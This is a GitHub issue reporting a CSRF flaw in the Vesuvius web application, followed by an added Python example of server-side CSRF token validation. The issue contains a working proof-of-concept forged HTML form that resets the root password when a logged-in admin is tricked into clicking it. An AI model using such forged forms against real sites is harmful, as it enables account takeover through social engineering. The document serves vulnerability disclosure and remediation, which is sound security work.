CSRF vulnerability #56

Open
sampathLiyanage opened this issue Mar 13, 2014 · 0 comments

I checked the security of Vesuvius and found a critical vulnerability. Vesuvius forms don't have CSRF tokens...!!! This allows someone to submit Vesuvius forms from any webpage outside Vesuvius.

For example, if an attacker wants to change the password of the user "root", the attacker can change it by following the steps below.

  1. Host a website and create the following form on a webpage.

    <form method="post"
    action="http://localhost/vesuvius/www/admin?passwdp&amp;tabid=5" name="form0">
    <input type="hidden" name="user" value="1">
    <input type="hidden" name="password" value="hacked">
    <input type="hidden" name="re_password" value="hacked">
    <input type="submit" value="Click Here"></form>

    Note: the form action changes according to the web address of Vesuvius.

  2. Send the link of the webpage to the Vesuvius admin and make the admin click the button. If the admin clicks the button while he is logged in to Vesuvius, the password of the user "root" will be changed to "hacked" immediately...!!!

    With a bit of social engineering this can be achieved easily.
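
A server-side check that closes the gap reported above, as an added example that is not part of the original issue or of the Vesuvius code: a session-bound token that every state-changing form must carry, verified before the handler acts. The field name `csrf_token`, the session identifiers, the function names and the sample requests are hypothetical and constructed for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed per-process secret; a real deployment loads a stable key from config.
SERVER_KEY = secrets.token_bytes(32)
TOKEN_FIELD = "csrf_token"  # hypothetical hidden-field name


def _mac(session_id: str, nonce: str) -> str:
    msg = f"{session_id}|{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(session_id: str) -> str:
    """Token embedded in every form rendered for this session: nonce.HMAC."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def token_is_valid(session_id: str, token) -> bool:
    """True only for a token issued for this exact session."""
    if not isinstance(token, str) or token.count(".") != 1:
        return False
    nonce, mac = token.split(".")
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())


def handle_password_change(session_id: str, post: dict) -> int:
    """Hypothetical handler gate: returns the HTTP status it would send."""
    if not token_is_valid(session_id, post.get(TOKEN_FIELD)):
        return 403  # cross-site form: the cookie is sent, but no valid token
    if not post.get("password") or post.get("password") != post.get("re_password"):
        return 400
    return 200  # the real handler would update the password here


# Constructed requests. The first has exactly the fields of the form in the issue.
ADMIN_SESSION = "sess-admin-constructed"
FORGED_POST = {"user": "1", "password": "hacked", "re_password": "hacked"}
LEGIT_POST = {"user": "1", "password": "n3w-pass", "re_password": "n3w-pass",
              TOKEN_FIELD: issue_token(ADMIN_SESSION)}

if __name__ == "__main__":
    print("forged:", handle_password_change(ADMIN_SESSION, FORGED_POST))
    print("legit: ", handle_password_change(ADMIN_SESSION, LEGIT_POST))
```

The forged request is rejected even though it arrives inside the admin's logged-in session, because a page on another origin cannot read the token the server embedded in the genuine form.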
